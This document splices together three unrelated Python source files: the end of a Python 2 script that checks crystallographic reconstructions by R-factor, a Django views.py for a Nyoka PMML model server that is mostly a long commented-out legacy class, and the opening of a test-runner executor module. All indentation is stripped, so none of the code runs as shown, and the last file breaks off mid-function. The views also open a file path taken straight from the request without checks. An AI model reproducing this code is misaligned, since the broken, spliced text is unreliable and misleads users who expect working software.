f.close()
g.close()
break
# if we are not DONE
        # calculate the percent difference of R-work of the reconstructed pdb vs the mtz data
[pdb_file,sf_file,file_name] = x
print 'Processing file {}'.format(file_name)
try:
r = r_factor_calc([pdb_file,sf_file],eps=2e-3,fromRCSB=False)
msg = 'OK'
except Sorry as e:
r = 100
msg = e.message
except TypeError as e:
r = 100
msg = e.message
# Write results to file
outString = '{0}:{1}:{2}\n'.format(file_name,r,msg)
lock.acquire()
if r<1:
f.write(outString)
print outString
else:
g.write(outString)
print outString
lock.release()
def make_dict(index_file_name,data_dir=''):
'''
    Read all file names from the PDB mirror folder, structure factor files
    or another file containing file names
    for PDB files check the correct folder using os.environ["PDB_MIRROR_PDB"]
and the file name is 'INDEX'
for structure factor files use os.environ["PDB_MIRROR_STRUCTURE_FACTORS"]
and the file name 'INDEX'
input:
data_dir : the directory containing a file with the names of files we want to extract
index_file_name : file names list
Output:
a dictionary
{file_name: file_path,...}
'''
file_names = open(os.path.join(data_dir, index_file_name), "r").readlines()
result = {}
for file_path in file_names:
# file_path looks like: '/net/chevy/raid1/pdb_mirror/pdb/00/pdb100d.ent.gz'
# file_name should look like 'pdb100d'
file_path = file_path.strip()
file_name = file_path.split('/')[-1]
file_name = file_name.split('.')[0]
if file_name.startswith('pdb'):
# pdb file names in INDEX are like 'pdb2vpf', the file_name should be '2vpf'
file_name = file_name[3:]
elif file_name.startswith('r'):
# structure factor file names in INDEX are like 'r1oqjsf', it should be '1oqj'
file_name = file_name[1:-2]
else:
            print 'File naming problems!!!'
print file_name
break
if file_path.startswith('/net'):
result[file_name] = file_path
else:
result[file_name] = data_dir+file_path
return result
def run():
'''
good_MTRIX_pdb_files, good_BIOMT_pdb_files and structure_factors_files
are dictionaries. the keys are pdb record name and the values are the
appropriate file full path
'''
# If you already have the dictionaries use:
good_MTRIX_pdb_files = pickle.load(open('dict_good_MTRIX_pdb_files','r'))
good_BIOMT_pdb_files = pickle.load(open('dict_good_BIOMT_pdb_files','r'))
structure_factors_files = pickle.load(open('dict_structure_factors_files','r'))
MTRIX_with_Straucture_Factor = pickle.load(open('MTRIX_with_Straucture_Factor_file_list','r'))
print 'Dictionaries are loaded...'
    # run test - compare r-work from the reconstructed pdb file to that of the mtz data
print '*'*50
print 'Start testing MTRIX reconstruction testing'
print '*'*50
# Load previous results
reconstruction_test_dict = pickle.load(open('reconstruction_test_dict','r'))
reconstruction_test_list = pickle.load(open('reconstruction_test_list','r'))
    # iterate over files and calculate the quality of R-work of the reconstructed pdb file
    # Test all files in MTRIX_with_Straucture_Factor
    # collect all good results and save them to a file so that
    # they are not repeated
#tested_files = open('Collect_tested_files',"r").readlines()
tested_files = open('Collect_tested_files',"r").read().splitlines()
files_with_problems = open('files_with_problems',"r").read().splitlines()
# Clean the remarks - use only protein name
files_with_problems = [x[:4] for x in files_with_problems]
tested_files = [x[:4] for x in tested_files]
# start queue
queue = Queue()
lock = Lock()
reader_p = Process(target=Call_function, args=(queue,lock))
reader_p.daemon = True
reader_p.start()
for file_name in MTRIX_with_Straucture_Factor:
if (file_name not in tested_files) and (file_name not in files_with_problems):
pdb_file = good_MTRIX_pdb_files[file_name]
sf_file = structure_factors_files[file_name]
queue.put([pdb_file,sf_file,file_name])
queue.put('DONE')
# close the parallel process
reader_p.join() # wait for the reader to finish
# Analyze the results and add them to dictionaries
tested_files = open('Collect_tested_files',"r").read().splitlines()
for x in tested_files:
[file_name,r,msg] = x.split(':')
r = float(r)
reconstruction_test_dict[file_name] = r
reconstruction_test_list.append(r)
# save the results
pickle.dump(reconstruction_test_dict,open('reconstruction_test_dict','w'))
pickle.dump(reconstruction_test_list,open('reconstruction_test_list','w'))
print 'Done...'
if __name__=='__main__':
# move to working directory
os.chdir('/net/cci-filer2/raid1/home/youval/Work/work')
#os.chdir('c:\\Phenix\\Dev\\Work\\work')
# check how many processors are available
run()
|
views.py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
from django.views.decorators.http import require_POST
from django.views.generic import View
import json
from datetime import datetime
from multiprocessing import Lock, Process
from rest_framework import permissions
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.decorators import api_view,schema
import requests, json,sys,subprocess, typing
from nyokaserver import nyokaUtilities,nyokaPMMLUtilities
from nyoka import PMML43Ext as pml
from nyokaserver.nyokaServerClass import NyokaServer
from KerasModelSupport.views import KerasExecution,ONNXExecution
class PMMLView(APIView):
http_method_names=['get']
def dispatch(self,requests):
if requests.method=='GET':
result=self.get(requests)
else:
return JsonResponse({},status=405)
return result
def get(self,requests):
try:
filePath=requests.GET['filePath']
if not filePath:
raise Exception("Invalid Request Parameter")
except:
return JsonResponse({'error':'Invalid Request Parameter'},status=400)
import pathlib
fO=pathlib.Path(filePath)
if fO.suffix == '.pmml':
print ('Came to PMML')
return NyokaServer.getDetailsOfPMML(filePath)
elif fO.suffix == '.h5':
return KerasExecution().getDetailsfromKerasModel(filePath)
elif fO.suffix == '.onnx':
return ONNXExecution().getDetailsfromOnnxModel(filePath)
class PMMLGlobalView(APIView):
http_method_names=['get']
def dispatch(self,requests):
if requests.method=='GET':
result=self.get(requests)
else:
return JsonResponse({},status=405)
return result
def get(self,requests):
return NyokaServer.getGlobalObject()
class PMMLOpeartionView(APIView):
http_method_names=['post']
    def dispatch(self,requests,projectID):
        if requests.method=='POST':
result=self.post(requests,projectID)
else:
return JsonResponse({},status=405)
return result
def post(self,requests,projectID):
try:
filePath=requests.POST.get('filePath')
if not filePath:
raise Exception("Invalid Request Parameter")
except:
return JsonResponse({'error':'Invalid Request Parameter'},status=400)
return NyokaServer.addArchitectureToGlobalMemoryDict(projectID,filePath)
class PMMLLayerView(APIView):
http_method_names=['put','delete']
def dispatch(self,requests,projectID):
if requests.method=='PUT':
result=self.put(requests,projectID)
elif requests.method=='DELETE':
result=self.delete(requests,projectID)
else:
return JsonResponse({},status=405)
return result
def delete(self,requests,projectID):
userInput = json.loads(requests.body)
try:
payload=userInput['layerDelete']
if not payload:
raise Exception("Invalid Request Parameter")
except:
return JsonResponse({'error':'Invalid Request Parameter'},status=400)
if 'modelType' in payload:
if payload['modelType']== 'Workflow':
return NyokaServer.deleteWorkflowlayer(userInput,projectID)
else:
return NyokaServer.deletelayer(userInput,projectID)
def put(self,requests,projectID):
userInput = json.loads(requests.body)
try:
payload=userInput['layerToUpdate']
if not payload:
raise Exception("Invalid Request Parameter")
except:
return JsonResponse({'error':'Invalid Request Parameter'},status=400)
if 'modelType' in payload:
if payload['modelType']== 'Workflow':
return NyokaServer.updatetoWorkflow(payload,projectID)
elif payload['modelType']== 'WorkflowBeta':
return NyokaServer.updatetoWorkflowBeta(payload,projectID)
else:
return NyokaServer.updatetoArchitecture(payload,projectID)
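# Illustrative request bodies for the PUT / DELETE handlers above (the field values are
# placeholders; only the key names and the 'Workflow' / 'WorkflowBeta' modelType values
# are taken from the code itself):
#
#   PUT    {"layerToUpdate": {"modelType": "Workflow", ...}}
#   DELETE {"layerDelete":   {"modelType": "Workflow", ...}}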
# from SwaggerSchema.schemas import (
# addArchitectureSwagger,
# updateLayerSwagger,
# deleteLayerSwagger,
# getDetailsOfPMMLswagger)
# nyokaUtilities = nyokaUtilities.NyokaUtilities()
# nyokaPMMLUtilities = nyokaPMMLUtilities.NyokaPMMLUtilities()
# global lockForPMML
# lockForPMML = None
# def create_lock():
# global lockForPMML
# lockForPMML = Lock()
# print(lockForPMML.__dir__())
# settingFilePath='./settingFiles/'
# savedModels='./SavedModels/'
# global MEMORY_DICT_ARCHITECTURE,MEMORY_OF_LAYERS
# MEMORY_DICT_ARCHITECTURE={}
# MEMORY_OF_LAYERS={}
# layerDetail=open(settingFilePath+'listOflayers.json','r')
# MEMORY_OF_LAYERS=json.loads(layerDetail.read())
# class NyokaServer:
# @csrf_exempt
# @api_view(['GET'])
# def listOfLayers(requests):
# global MEMORY_OF_LAYERS
# print('response sent')
# return JsonResponse(MEMORY_OF_LAYERS,safe=False)
# @csrf_exempt
# @api_view(['POST'])
# @schema(addArchitectureSwagger)
# def addArchitectureToGlobalMemoryDict(requests):
# global MEMORY_DICT_ARCHITECTURE
# projectID=requests.POST.get('projectID')
# filePath=requests.POST.get('filePath')
# try:
# MEMORY_DICT_ARCHITECTURE[projectID]
# except:
# MEMORY_DICT_ARCHITECTURE[projectID]={}
# try:
# print ('filePath >>>> ',filePath)
# archFromPMML=nyokaUtilities.pmmlToJson(filePath)
# print ('pass')
# MEMORY_DICT_ARCHITECTURE[projectID]['architecture']=archFromPMML
# except:
# MEMORY_DICT_ARCHITECTURE[projectID]['architecture']=[]
# #######################################################
# MEMORY_DICT_ARCHITECTURE[projectID]['filePath']=filePath
# MEMORY_DICT_ARCHITECTURE[projectID]['projectID']=projectID
# # print(MEMORY_DICT_ARCHITECTURE)
# print('response sent')
# return JsonResponse(MEMORY_DICT_ARCHITECTURE[projectID])
# def selectArchitecture(checkTemplateID):
# if checkTemplateID=='mobilenetArch':
# pmmlObj = pml.parse(open(settingFilePath+'MobilenetArch.pmml','r'), silence=True)
# templateArch=nyokaUtilities.pmmlToJson(settingFilePath+'MobilenetArch.pmml')
# elif checkTemplateID=='vgg16Arch':
# pmmlObj = pml.parse(open(settingFilePath+'vGG16Arch.pmml','r'), silence=True)
# templateArch=nyokaUtilities.pmmlToJson(settingFilePath+'vGG16Arch.pmml')
# elif checkTemplateID=='vgg19Arch':
# pmmlObj = pml.parse(open(settingFilePath+'vGG19Arch.pmml','r'), silence=True)
# templateArch=nyokaUtilities.pmmlToJson(settingFilePath+'vGG19Arch.pmml')
# return templateArch,pmmlObj
# @csrf_exempt
# @api_view(["POST"])
# @schema(updateLayerSwagger)
# def updatetoArchitecture(requests):
# global lockForPMML
# print ('#######################################################################')
# global MEMORY_DICT_ARCHITECTURE, lockForPMML
# userInput=requests.body
# userInput=json.loads(userInput)
# payload=userInput['layerToUpdate']
# print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$",type(payload))
# tempGlobal=MEMORY_DICT_ARCHITECTURE[userInput['projectID']]
# filetoSave=tempGlobal['filePath']
# existingArch=tempGlobal['architecture']
# oldLenOfArchitecture = len(existingArch)
# ####################################
# try:
# lockForPMML.acquire()
# existingPmmlObj=pml.parse(filetoSave,silence=True)
# except Exception as e:
# print('>>>>>>>>>>>>>>>>> ', str(e))
# existingPmmlObj=None
# finally:
# lockForPMML.release()
# newPmmlObj=None
# templatePmml=None
# if payload['itemType'] in ['FOLDING','DATA','CODE','TEMPLATE']:
# processTheInput=payload
# else:
# try:
# processTheInput=nyokaUtilities.addLayertoJson(payload)
# except:
# processTheInput=payload
# # print ('Ouput which we got >>>>>>>>>>> ',processTheInput)
# newArch=[]
# listOFIDS,listOFIndices,listOFIdIndex,listOfSectionID,listOFSectionIdIndex,listOFSectionIdAndId=nyokaUtilities.detailsofExistingArch(existingArch)
# listOfAllIDinSections=[]
# for j in existingArch:
# if j['itemType']=='FOLDING':
# for num,k in enumerate(j['children']):
# listOfAllIDinSections.append(k['id'])
# indexInObj=nyokaUtilities.checkIndexOfInput(processTheInput)
# idInObj=nyokaUtilities.getIdOfInput(processTheInput)
# itemTypeofObj=processTheInput['itemType']
# print ('Ouput itemTypeofObj we got >>>>>>>>>>> ',itemTypeofObj)
# # print ('nyokaUtilities.checkAboutLayer(processTheInput)',nyokaUtilities.checkAboutLayer(processTheInput))
# if len(existingArch) ==0:
# if nyokaUtilities.checkAboutLayer(processTheInput) == 'TEMPLATE':
# print ('B1 Given input is of Type Template')
# checkTemplateID=processTheInput['templateId']
# # $update$
# templateArch,templatePmml=self.selectArchitecture(checkTemplateID)
# if indexInObj not in listOFIndices:
# existingArch=existingArch+templateArch
# else:
# existingArch=existingArch[:indexInObj]+templateArch+existingArch[indexInObj:]
# else:
# print ('A1 len of existingArch is 0')
# newArch.append(processTheInput.copy())
# existingArch=newArch.copy()
# elif len(existingArch)>0:
# #######################################################################################################################
# if nyokaUtilities.checkAboutLayer(processTheInput) == 'Section':
# print ('A2 Given input is of Type Section')
# sectionIdOfInput=nyokaUtilities.getIdOfSection(processTheInput)
# tupleOFindexSect=[(i['layerIndex'],i['sectionId']) for i in existingArch if i['itemType']=='FOLDING']
# print ('>>>>>>>>>>>>>>>>>>> ',tupleOFindexSect)
# print ('<<<<<<<<<<<<<<<<<<<< ',indexInObj,sectionIdOfInput)
# if ((indexInObj,sectionIdOfInput) in tupleOFindexSect) & (nyokaUtilities.checkChildren(processTheInput) ==True):
# print ('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Came here')
# existingArch[indexInObj]=payload.copy()
# elif (sectionIdOfInput in listOfSectionID) and (sectionIdOfInput != None):
# print ('A3 Section Id exist ',sectionIdOfInput )
# listOfIDSwheretomove=[j['id'] for j in [i for i in existingArch if i['itemType']=='FOLDING' if i['sectionId']==sectionIdOfInput][0]['children']]
# indexOfObject=existingArch.index([j for j in [i for i in existingArch if nyokaUtilities.checkExistForSectionFilter(i)] if j['sectionId']==sectionIdOfInput][0])
# tempSection=existingArch[indexOfObject]
# sectionArch=tempSection['children']
# if idInObj in listOFIDS:
# try:
# toRem=[i['id'] for i in existingArch].index(idInObj)
# existingArch.remove(existingArch[toRem])
# except:
# pass
# # print ('$$$$$$$$$$$$',[i['id'] for i in existingArch])
# tempSectionArch=[]
# if len(sectionArch)==0:
# print ('A4 Section Id exist and No elment in children hence adding',sectionIdOfInput,idInObj )
# tempSectionArch.append(processTheInput.copy())
# tempSection['children']=tempSectionArch
# elif len(sectionArch)>0:
# sectionListOFIDS,sectionListOFIndices,sectionListOFIdIndex=nyokaUtilities.detailsofSectionArch(tempSection)
# print ('A5 Section Id exist there are element in children hence checking What to do',sectionIdOfInput,idInObj )
# if idInObj in listOFIDS:
# print ('A6_0 element Id exist',idInObj )
# if (sectionIdOfInput,indexInObj,idInObj) in listOFSectionIdIndex:
# print ('A6 Section Id Index and object Id matched just update',sectionIdOfInput,indexInObj,idInObj )
# existingArch[indexOfObject]['children'][indexInObj]=processTheInput.copy()
# elif (sectionIdOfInput,idInObj) in listOFSectionIdAndId:
# if indexInObj in sectionListOFIndices:
# print ('A7 Index {} exist alrady need to swap and reorder'.format(indexInObj))
# tempIndExist=[j['id'] for j in sectionArch].index(idInObj)
# del sectionArch[tempIndExist]
# sectionArch.insert(indexInObj,processTheInput.copy())
# for num,lay in enumerate(sectionArch):
# lay['layerIndex']=num
# newArch.append(lay)
# existingArch[indexOfObject]['children']=newArch.copy()
# elif idInObj not in listOfAllIDinSections:
# print ('A70 Index exist but not in section need to add')
# # print (idInObj,[i['id'] for i in existingArch])
# if idInObj in [i['id'] for i in existingArch]:
# print ('A701 Index exist but not in section probably section is empty')
# toDel=[i['id'] for i in existingArch].index(idInObj)
# existingArch.remove(existingArch[toDel])
# newSecArch=nyokaUtilities.makeModification(sectionArch,processTheInput)
# sectionArch=newSecArch.copy()
# else:
# # print (listOFSectionIdAndId)
# toremoveFromSection=[j[0] for j in listOFSectionIdAndId if j[0]==sectionIdOfInput][0]
# indexOfsectionInArch=existingArch.index([j for j in existingArch if j['itemType']=='FOLDING' if j['sectionId']==toremoveFromSection][0])
# # toDel=[i['id'] for i in existingArch].index(idInObj)
# # existingArch.remove(existingArch[toDel])
# print ('A702 Index section not empty')
# if indexInObj in [i['layerIndex'] for i in sectionArch]:
# print ('A703 Index section not empty')
# sectionArch.insert(processTheInput.copy(),indexInObj)
# else:
# print ('A704 Index section not empty')
# sectionArch.append(processTheInput.copy())
# print ([i['id'] for i in sectionArch])
# existingArch[indexOfsectionInArch]['children']=sectionArch
# # print ([i['id'] for i in existingArch])
# elif idInObj not in listOfIDSwheretomove:
# print ('A7_1 the id exist but not in section so deleting and appending')
# toremoveFromSection=[j[0] for j in listOFSectionIdAndId if j[1]==idInObj][0]
# indexOfsectionInArch=existingArch.index([j for j in existingArch if j['itemType']=='FOLDING' if j['sectionId']==toremoveFromSection][0])
# indexOfObjecttoremove=[j['id'] for j in existingArch[indexOfsectionInArch]['children']].index(idInObj)
# toremoveFromSection,indexOfsectionInArch,indexOfObjecttoremove
# del existingArch[indexOfsectionInArch]['children'][indexOfObjecttoremove]
# tempStrucOfChildList=[]
# for num,elem in enumerate(existingArch[indexOfsectionInArch]['children']):
# tempStrucOfChild=elem.copy()
# tempStrucOfChild['layerIndex']=num
# tempStrucOfChildList.append(tempStrucOfChild)
# existingArch[indexOfsectionInArch]['children']=tempStrucOfChildList.copy()
# newArch=nyokaUtilities.makeModification(sectionArch,processTheInput)
# existingArch[indexOfObject]['children']=newArch
# else:
# print ('A8 Section Id exist there are element and new element has came figure out the place',sectionIdOfInput,idInObj )
# if indexInObj in sectionListOFIndices:
# print ('>>>>>>>>>> Section Id exist > 0 but ID is not fiund but Index has ben found',sectionIdOfInput,idInObj )
# newArch=nyokaUtilities.makeModification(sectionArch,processTheInput)
# existingArch[indexOfObject]['children']=newArch.copy()
# else:
# sectionArch.append(processTheInput)
# existingArch[indexOfObject]['children']=sectionArch.copy()
# #3####################################################################################################################
# else:
# print ('A9 Id does not exist ',idInObj )
# if indexInObj in listOFIndices:
# print ('A10 Index {} exist alrady'.format(indexInObj))
# newArch=nyokaUtilities.makeModification(existingArch,processTheInput)
# existingArch=newArch.copy()
# else:
# print ('A11 Id does not exist nor the index ',idInObj )
# existingArch.append(processTheInput.copy())
# elif nyokaUtilities.checkAboutLayer(processTheInput) == 'TEMPLATE':
# print ('B1 Given input is of Type Template')
# checkTemplateID=processTheInput['templateId']
# templateArch, templatePmml=self.selectArchitecture(checkTemplateID)
# if indexInObj not in listOFIndices:
# existingArch=existingArch+templateArch
# else:
# existingArch=existingArch[:indexInObj]+templateArch+existingArch[indexInObj:]
# else:
# print ('A11 Given input is of Type Layer')
# print ('A12 len of existingArch is > 0')
# if idInObj in listOFIDS:
# print ('A13 Id exist ',idInObj )
# if (indexInObj,idInObj) in listOFIdIndex:
# print ('The layer already exist and index also matches and just needed to be updated')
# for lay in existingArch:
# indexLay=nyokaUtilities.checkIndexOfInput(lay)
# idInLay=nyokaUtilities.getIdOfInput(lay)
# if (indexInObj,idInObj) ==(indexLay,idInLay):
# print ('A13 Id exist processTheInput')
# newArch.append(processTheInput.copy())
# else:
# newArch.append(lay)
# existingArch=newArch.copy()
# else:
# print ('The layer already exist but index has changed needed to be restructre')
# print ('listOFIndices',listOFIndices)
# print ('indexInObj',indexInObj)
# if indexInObj in listOFIndices:
# print ('A14 Index {} exist alrady need to swap and reorder'.format(indexInObj))
# tempIndExist=[j['id'] for j in existingArch].index(idInObj)
# del existingArch[tempIndExist]
# print (len(existingArch))
# existingArch.insert(indexInObj,processTheInput.copy())
# for num,lay in enumerate(existingArch):
# lay['layerIndex']=num
# newArch.append(lay)
# existingArch=newArch.copy()
# else:
# groupwithID=[]
# for j in existingArch:
# if j['itemType']=='FOLDING':
# for num,k in enumerate(j['children']):
# groupwithID.append((j['id'],k['id'],num))
# sectionToRemove=[j for j in groupwithID if j[1]==idInObj][0]
# indexOfSectoDel=[i['id'] for i in existingArch].index(sectionToRemove[0])
# tempSecToremoveFrom=existingArch[indexOfSectoDel]['children'].copy()
# for tem in tempSecToremoveFrom:
# if tem['id']==idInObj:
# tempSecToremoveFrom.remove(tem)
# for numa,tem2 in enumerate(tempSecToremoveFrom):
# tem2['layerIndex']=numa
# existingArch[indexOfSectoDel]['children']=tempSecToremoveFrom
# existingArch.append(processTheInput.copy())
# else:
# print ('A15 Id does not exist ',idInObj )
# if indexInObj in listOFIndices:
# print ('A16 Index {} exist alrady'.format(indexInObj))
# newArch=nyokaUtilities.makeModification(existingArch,processTheInput)
# existingArch=newArch.copy()
# else:
# existingArch.append(processTheInput.copy())
# for num,coco in enumerate(existingArch):
# if coco['itemType']=='FOLDING':
# for num2,k in enumerate(coco['children']):
# k['layerIndex']=num2
# coco['layerIndex']=num
# else:
# coco['layerIndex']=num
# tempGlobal['architecture']=existingArch
# indexToUpdate = payload['layerIndex']
# indexInPmml = 0
# foundTheLayer = False
# if not existingPmmlObj or len(existingPmmlObj.DeepNetwork[0].NetworkLayer)==0:
# indexInPmml = 0
# else:
# prevId = ''
# import ast
# for idx,layer in enumerate(existingPmmlObj.DeepNetwork[0].NetworkLayer):
# if indexInPmml == indexToUpdate:
# indexInPmml = idx
# foundTheLayer = True
# break
# if not layer.Extension:
# indexInPmml += 1
# else:
# secId = ast.literal_eval(layer.Extension[0].value)['sectionId']
# if secId != prevId:
# indexInPmml += 1
# prevId = secId
# if not foundTheLayer:
# indexInPmml = len(existingPmmlObj.DeepNetwork[0].NetworkLayer)
# else:
# if existingPmmlObj.Header.Extension:
# indexInPmml -= 1
# if existingPmmlObj.script:
# indexInPmml -= 1
# print('$$$$$$$$$$$$$$$$$',indexInPmml)
# # create the PMML for the newly updated architecture
# newPmmlObj = nyokaPMMLUtilities.getPmml(existingArch)
# # if template is picked then check if existing pmml already has some layers or not
# if templatePmml:
# if len(templatePmml.DeepNetwork[0].NetworkLayer) == len(newPmmlObj.DeepNetwork[0].NetworkLayer):
# for idx,lay in enumerate(newPmmlObj.DeepNetwork[0].NetworkLayer):
# templatePmml.DeepNetwork[0].NetworkLayer[idx].Extension = lay.Extension
# else:
# diff = len(newPmmlObj.DeepNetwork[0].NetworkLayer) - len(templatePmml.DeepNetwork[0].NetworkLayer)
# for idx in range(len(templatePmml.DeepNetwork[0].NetworkLayer)):
# templatePmml.DeepNetwork[0].NetworkLayer[idx].Extension = newPmmlObj.DeepNetwork[0].NetworkLayer[idx+diff].Extension
# newPmmlObj.DeepNetwork = templatePmml.DeepNetwork
# layerIdsInPmml = list()
# for lay in existingPmmlObj.DeepNetwork[0].NetworkLayer:
# layerIdsInPmml.append(lay.layerId)
# # print(payload['itemType'], payload['layerId'], layerIdsInPmml)
# # if the update is for code or data then do not change the deep network
# if payload['itemType'] in ['DATA','CODE']:
# pass
# # if updated layer is already present then update the layer only
# elif str(payload['layerId']) in layerIdsInPmml:
# indexInPmml = layerIdsInPmml.index(str(payload['layerId']))
# print(indexInPmml)
# print(existingPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml].__dict__)
# existingPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml] = newPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml]
# # if new layer and index is out of bound then add to the last
# elif indexInPmml >= len(newPmmlObj.DeepNetwork[0].NetworkLayer):
# if existingPmmlObj:
# existingPmmlObj.DeepNetwork[0].NetworkLayer = existingPmmlObj.DeepNetwork[0].NetworkLayer+\
# newPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml:]
# else:
# existingPmmlObj = newPmmlObj
# # if new layer and within index range then insert it there
# else:
# if templatePmml:
# existingPmmlObj.DeepNetwork[0].NetworkLayer = existingPmmlObj.DeepNetwork[0].NetworkLayer[:indexInPmml]+\
# newPmmlObj.DeepNetwork[0].NetworkLayer+existingPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml:]
# else:
# existingPmmlObj.DeepNetwork[0].NetworkLayer = existingPmmlObj.DeepNetwork[0].NetworkLayer[:indexInPmml]+\
# [newPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml]]+existingPmmlObj.DeepNetwork[0].NetworkLayer[indexInPmml:]
# newPmmlObj.DeepNetwork[0].NetworkLayer = existingPmmlObj.DeepNetwork[0].NetworkLayer
# newPmmlObj.DeepNetwork[0].numberOfLayers = len(newPmmlObj.DeepNetwork[0].NetworkLayer)
# if newPmmlObj.Header.Extension:
# newPmmlObj.Header.Extension[0].anytypeobjs_ = ['']
# for lay in newPmmlObj.DeepNetwork[0].NetworkLayer:
# if lay.Extension:
# lay.Extension[0].anytypeobjs_ = ['']
# try:
# lockForPMML.acquire()
# newPmmlObj.export(open(filetoSave,'w'),0)
# finally:
# lockForPMML.release()
# # train_prc = Process(target=nyokaPMMLUtilities.writePMML,args=(existingArch,filetoSave))
# # train_prc.start()
# # # print (MEMORY_DICT_ARCHITECTURE)
# if nyokaUtilities.checkAboutLayer(processTheInput) == 'TEMPLATE':
# returntoClient={'projectID':userInput['projectID'],'architecture':tempGlobal['architecture']}
# else:
# returntoClient={'projectID':userInput['projectID'],'layerUpdated':processTheInput}
# print('response sent')
# return JsonResponse(returntoClient)
# def writePmml(self,pmmlObj, filepath, lockForPMML):
# try:
# lockForPMML.acquire()
# pmmlObj.export(open(filepath,'w'),0)
# print('>>>>>>>>>>>, PMML written')
# except Exception as e:
# print('>>>>>>>>>>>> ',str(e))
# finally:
# lockForPMML.release()
# @csrf_exempt
# @api_view(['POST'])
# @schema(deleteLayerSwagger)
# def deletelayer(requests):
# userInput=requests.body
# userInput=json.loads(userInput)
# global MEMORY_DICT_ARCHITECTURE
# global lockForPMML
# print ('>>>>>',userInput)
# existingArch=MEMORY_DICT_ARCHITECTURE[userInput['projectID']]['architecture']
# # $update$
# filetoSave=MEMORY_DICT_ARCHITECTURE[userInput['projectID']]['filePath']
# try:
# lockForPMML.acquire()
# existingPmmlObj=pml.parse(filetoSave,silence=True)
# except Exception as e:
# print('>>>>>>>>>>>>>>>>> ', str(e))
# existingPmmlObj=None
# finally:
# lockForPMML.release()
# existingPmmlObj=pml.parse(filetoSave, silence=True)
# layerIdToDelete=userInput['layerDelete']['layerId']
# processTheInput=userInput['layerDelete']
# try:
# deleteFromSection=processTheInput['sectionId']
# if processTheInput['itemType']!='FOLDING':
# idToDelete=processTheInput['id']
# positionOfSection=existingArch.index([j for j in existingArch if j['itemType']=='FOLDING' if j['sectionId']==deleteFromSection][0])
# positionInChildren=[j['id'] for j in existingArch[positionOfSection]['children']].index(idToDelete)
# del existingArch[positionOfSection]['children'][positionInChildren]
# else:
# positionOfSection=existingArch.index([j for j in existingArch if j['itemType']=='FOLDING' if j['sectionId']==deleteFromSection][0])
# del existingArch[positionOfSection]
# except:
# idToDelete=processTheInput['id']
# positionInArch=[j['id'] for j in existingArch].index(idToDelete)
# del existingArch[positionInArch]
# for num,lay in enumerate(existingArch):
# if lay['itemType']=='FOLDING':
# for num2,levLay in enumerate(lay['children']):
# levLay['layerIndex']=num2
# else:
# lay['layerIndex']=num
# # $update$
# indexToDelete = -1
# for index, layer in enumerate(existingPmmlObj.DeepNetwork[0].NetworkLayer):
# print("**********************************",layer.layerId)
# if layer.layerId == layerIdToDelete:
# indexToDelete = index
# break
# if indexToDelete != -1:
# del existingPmmlObj.DeepNetwork[0].NetworkLayer[indexToDelete]
# existingPmmlObj.Header.Extension[0].anytypeobjs_ = ['']
# for lay in existingPmmlObj.DeepNetwork[0].NetworkLayer:
# if lay.Extension:
# lay.Extension[0].anytypeobjs_ = ['']
# existingPmmlObj.DeepNetwork[0].numberOfLayers = len(existingPmmlObj.DeepNetwork[0].NetworkLayer)
# try:
# lockForPMML.acquire()
# existingPmmlObj.export(open(filetoSave,'w'),0)
# except Exception as e:
# print('>>>>>>>>>> ', str(e))
# finally:
# lockForPMML.release()
# MEMORY_DICT_ARCHITECTURE[userInput['projectID']]['architecture']=existingArch
# message={'message':'Success'}
# return JsonResponse(message)
# @csrf_exempt
# @api_view(['POST'])
# def getGlobalObject(requests):
# global MEMORY_DICT_ARCHITECTURE
# return JsonResponse(MEMORY_DICT_ARCHITECTURE)
# @csrf_exempt
# @api_view(['POST'])
# @schema(getDetailsOfPMMLswagger)
# def getDetailsOfPMML(requests):
# # print('#######',requests.body)
# userInput=requests.body
# userInput=json.loads(userInput)
# filepath=userInput['filePath']
# # print('$$$$$$$$$$',filepath)
# # print('filepath',filepath)
# pmmlObj=pml.parse(filepath,silence=True)
# tempObj=pmmlObj.__dict__
# listOfObjectstogetData=[]
# for j in tempObj.keys():
# if (tempObj[j] is None) :
# pass
# elif (isinstance(tempObj[j], typing.List)):
# if (len(tempObj[j])==0):
# pass
# else:
# listOfObjectstogetData.append(j)
# else:
# listOfObjectstogetData.append(j)
# allInfo={}
# for towork in listOfObjectstogetData:
# if towork=='version':
# allInfo['Version']=tempObj['version']
# elif towork=='Header':
# allInfo.update(nyokaUtilities.getHeaderInfo(tempObj))
# elif towork=='DataDictionary':
# allInfo.update(nyokaUtilities.getDataFields(tempObj))
# elif towork=='NearestNeighborModel':
# allInfo.update(nyokaUtilities.getInfoNearestNeighborModel(tempObj))
# elif towork=='DeepNetwork':
# allInfo.update(nyokaUtilities.getInfoOfDeepNetwork(tempObj))
# elif towork=='MiningModel':
# allInfo.update(nyokaUtilities.getInfoMiningModel(tempObj))
# elif towork=='SupportVectorMachineModel':
# allInfo.update(nyokaUtilities.getInfoSupportVectorMachineModel(tempObj))
# elif towork=='TreeModel':
# allInfo.update(nyokaUtilities.getInfoTreeModel(tempObj))
# allInfo=nyokaUtilities.changeStructure(allInfo)
# print('response sent')
# return JsonResponse(allInfo)
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from six import text_type
from six.moves.http_client import HTTPConnection
from six.moves.urllib.parse import urljoin, urlsplit, urlunsplit
from ..testrunner import Stop
from .actions import actions
from .protocol import Protocol, BaseProtocolPart
here = os.path.dirname(__file__)
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type in ("reftest", "print-reftest"):
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
